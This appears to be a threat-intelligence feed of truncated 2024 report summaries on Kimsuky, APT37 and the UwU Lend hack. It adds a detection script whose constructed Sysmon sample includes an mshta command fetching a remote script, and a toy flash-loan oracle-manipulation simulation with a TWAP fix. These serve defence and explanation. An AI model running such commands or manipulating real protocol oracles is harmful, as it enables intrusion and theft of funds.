ASEC reported that Kimsuky exploited CVE-2017-11882 in the MS Office Equation Editor to launch mshta and run a malicious script that distributed a keylogger. The script connected to an error.php page that displayed a fake "Not Found" message while downloa…
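A detection check for the execution chain in that report (Equation Editor exploit spawning mshta.exe), added here as an illustration and not taken from ASEC's write-up. It runs over constructed, JSON-shaped approximations of Sysmon Event ID 1 (process creation) records; the paths, the IP address and the error.php URL in the sample lines are made up, and the parent/child process lists are the author's own choice of what to watch.

```python
"""Parent/child process check for Office-launched script hosts.

Added example: the log lines below are constructed Sysmon-style records, not
logs from the incident; EQNEDT32.EXE is the Equation Editor binary targeted
by CVE-2017-11882, the other Office parents are included because the same
chain can start from the document's host application.
"""
import json
import re
from typing import Optional

# Constructed sample log: one JSON object per line (JSON "\\" decodes to "\").
SAMPLE_LOG = r"""
{"EventID":1,"Image":"C:\\Windows\\System32\\mshta.exe","ParentImage":"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE","CommandLine":"mshta.exe http://203.0.113.5/error.php"}
{"EventID":1,"Image":"C:\\Windows\\System32\\mshta.exe","ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","CommandLine":"mshta.exe C:\\Users\\user\\AppData\\Local\\Temp\\page.hta"}
{"EventID":1,"Image":"C:\\Windows\\System32\\mshta.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"mshta.exe C:\\Tools\\helper.hta"}
{"EventID":1,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Windows\\System32\\svchost.exe","CommandLine":"powershell.exe -NoProfile -File C:\\Scripts\\inventory.ps1"}
"""

# Parents that should never need a script host (assumed watch list).
OFFICE_PARENTS = {"eqnedt32.exe", "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Living-off-the-land children commonly used as the next stage.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe",
                "cmd.exe", "rundll32.exe", "regsvr32.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> Optional[dict]:
    """Return an alert dict for a suspicious Office -> script-host spawn, else None."""
    if event.get("EventID") != 1:
        return None
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return None
    cmd = event.get("CommandLine", "")
    url = URL_RE.search(cmd)
    # Equation Editor spawning anything is abnormal; a remote URL on the
    # mshta command line matches the staged-download pattern described above.
    severity = "high" if parent == "eqnedt32.exe" or url else "medium"
    return {"severity": severity, "parent": parent, "child": child,
            "remote_url": url.group(0) if url else None, "command_line": cmd}


def scan(log_text: str) -> list:
    """Parse newline-delimited JSON records and collect alerts in order."""
    alerts = []
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        alert = evaluate(json.loads(line))
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(a["severity"], a["parent"], "->", a["child"],
              a["remote_url"] or a["command_line"])
```

Of the four constructed records, only the two Office-parented mshta launches alert; the explorer.exe and svchost.exe spawns are left alone, which is the point of keying on the parent rather than on mshta.exe by itself.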
2024 (654 reports)
Google reports that North Korean government-backed actors have accounted for roughly one third of government-backed phishing activity targeting Brazil since 2020. The DPRK-linked targeting focused on Brazilian government entities and the aerospace, techno…
APT-C-55, also known as Kimsuky, Mystery Baby, Baby Coin, Smoke Screen, BabyShark, and Cobra Venom, used the RandomQuery campaign to deliver open-source RAT components. The report describes malicious HTML email attachments that release LNK files and decoy…
With $173 million in these pools, the attacker used a 40K ETH flash loan to exploit the system. The protocol was paused soon after the exploit, and UwU Lend acknowledged it through its official X handle. The exploit could have been avoided by de…
SlowMist analyzed the June 10, 2024 UwU Lend hack as a $19.3 million price oracle manipulation against the protocol's EVM lending pools. The attacker used Tornado Cash-funded flash loans and large CurveFinance swaps to suppress and then inflate sUSDE pric…
Kimsuky delivered an Android phishing malware package named 8.aab, analyzed with jadx and identified by hashes including SHA-256 3e397e929c92d5f4fd6040cedb2ac6233d37ef29e96085d29dda04acf30b8355. The report documents requested Android permissions and frame…
ASEC observed SmallTiger malware in attacks against South Korean defense contractors, automobile parts makers, and semiconductor manufacturers. The initial access vector was not identified, but the actor moved laterally inside company networks and abused …
The threat actor appears to set the attack targets in advance and distributes malware after continuously collecting relevant information. The malware launched through the above process is XenoRAT, which can perform various malicious behaviors such a…
Lykke said it halted withdrawals after a June 4 exploit affecting Lykke UK and Lykke Corp AG, later estimating losses at more than $22 million. Blockchain researcher SomaXBT publicly alleged the breach on June 9 and accused the exchange of trying to conce…
Trend Micro's 2024 targeted-attack overview for Japan and nearby regional targets includes Void Imugi in its table of groups observed attacking Taiwan in 2023, listing Lazarus as an alias and noting worldwide historical targeting. The same article gives f…
UwuLend was drained of $19.4 million after an attacker manipulated fallback oracle pricing in a series of rapid transactions funded from Tornado Cash. The exploit used flash-loan-driven trades against Curve pool states, allowing borrowing at one sUSDe rat…
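The two UwU Lend summaries above describe the same pattern: flash-loan-funded swaps move an AMM's reserves, a lending pool that prices sUSDe from those reserves lends against the moved price, and the swaps are unwound in the same transaction. The following toy model, added here and not drawn from SlowMist's or any other analysis of the hack, shows the suppression leg of that pattern against a naive spot-price oracle and then against a time-weighted oracle. Everything in it is constructed: the pool is a constant-product AMM rather than a Curve StableSwap pool, and the reserves, LTV and flash-loan size are made-up numbers, not figures from the incident. The TWAP variant is one common mitigation, shown for contrast; the page does not say which fix the reports recommend.

```python
"""Toy flash-loan price-oracle manipulation against a lending pool.

Added example with constructed numbers; constant-product AMM stands in for
the Curve pool, and the lending rule (borrow value <= LTV * collateral value)
is a simplified stand-in for a real protocol's risk parameters.
"""
from dataclasses import dataclass


@dataclass
class ConstantProductPool:
    """x*y=k AMM holding sUSDe and USDe (fee-free for clarity)."""
    susde: float
    usde: float

    def spot_price(self) -> float:
        """USDe per sUSDe, as a naive reserve-reading oracle sees it."""
        return self.usde / self.susde

    def swap(self, token_in: str, amount_in: float) -> float:
        """Swap amount_in of token_in for the other token; return amount out."""
        k = self.susde * self.usde
        if token_in == "sUSDe":
            self.susde += amount_in
            new_usde = k / self.susde
            out, self.usde = self.usde - new_usde, new_usde
        elif token_in == "USDe":
            self.usde += amount_in
            new_susde = k / self.usde
            out, self.susde = self.susde - new_susde, new_susde
        else:
            raise ValueError(token_in)
        return out


class SpotOracle:
    """Vulnerable: price is whatever the reserves say at call time."""
    def __init__(self, pool: ConstantProductPool):
        self.pool = pool

    def price(self) -> float:
        return self.pool.spot_price()


class TwapOracle:
    """Hardened: mean of observations recorded in earlier blocks, so a swap
    inside the current transaction cannot move the price it reports."""
    def __init__(self, pool: ConstantProductPool, window: int = 10):
        self.pool, self.window, self.history = pool, window, []

    def record_block(self) -> None:
        """Called once per block by the protocol, not by the borrower."""
        self.history.append(self.pool.spot_price())

    def price(self) -> float:
        recent = self.history[-self.window:]
        return sum(recent) / len(recent)


def max_borrow_susde(collateral_usde: float, oracle, ltv: float = 0.8) -> float:
    """Lending rule: borrowed value (at oracle price) <= LTV * collateral value."""
    return collateral_usde * ltv / oracle.price()


def run_attack(oracle_kind: str) -> dict:
    """Run the suppression leg of the attack and report what the attacker nets."""
    pool = ConstantProductPool(susde=10_000_000.0, usde=10_000_000.0)
    if oracle_kind == "spot":
        oracle = SpotOracle(pool)
    else:
        oracle = TwapOracle(pool)
        for _ in range(10):            # ten quiet blocks before the attack block
            oracle.record_block()
    true_price = pool.spot_price()     # 1.0 USDe per sUSDe before any manipulation

    # 1. Flash-borrow sUSDe and dump it into the pool to suppress the spot price.
    flash = 5_000_000.0
    usde_received = pool.swap("sUSDe", flash)
    seen = oracle.price()

    # 2. Borrow sUSDe against USDe collateral while the oracle reads low.
    collateral = 1_000_000.0
    borrowed = max_borrow_susde(collateral, oracle)

    # 3. Buy the sUSDe back, restoring the reserves, and repay the flash loan.
    susde_back = pool.swap("USDe", usde_received)
    assert abs(susde_back - flash) < 1e-3

    # Attacker abandons the position: borrowed sUSDe at true value minus collateral.
    profit = borrowed * true_price - collateral
    return {"oracle_price_seen": seen, "borrowed_susde": borrowed,
            "attacker_profit_usde": profit, "pool_bad_debt_usde": max(profit, 0.0)}


if __name__ == "__main__":
    for kind in ("spot", "twap"):
        print(kind, run_attack(kind))
```

With the spot oracle the dump moves the reported price to 4/9 of its true value, so 1M USDe of collateral lets the attacker borrow 1.8M sUSDe and walk away with the difference as bad debt for the pool; with the ten-block TWAP the same swap changes nothing the oracle reports, the borrow stays at 0.8M sUSDe and the position is worth less than the collateral left behind. The inflation leg described in the summaries is the mirror image: push the price up, deposit sUSDe as collateral, and borrow the other asset.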
Resecurity summarizes U.S. charges against Christina Chapman and alleged co-conspirators who helped place overseas IT workers, many tied to North Korea, into remote jobs at more than 300 U.S. companies. The scheme used stolen or borrowed U.S. identities, …
Cyber threats such as phishing, malware, and ransomware have become more common, targeting both individual remote workers and the IT infrastructures of large organizations. The observed campaign in India reveals several prominent themes exploited in phish…
Kimsuky was assessed with high confidence as targeting a western European weapons-component manufacturer through spear-phishing emails using a General Dynamics job-description lure. The malicious attachment, Safety Manager JD (General Dynamics HR Division…
APT37/Reaper activity is tied to a malicious HWP document disguised as an eligibility form for humanities and social-sciences doctoral research support. The excerpt says the group is associated with espionage-focused targeting of government, military, lar…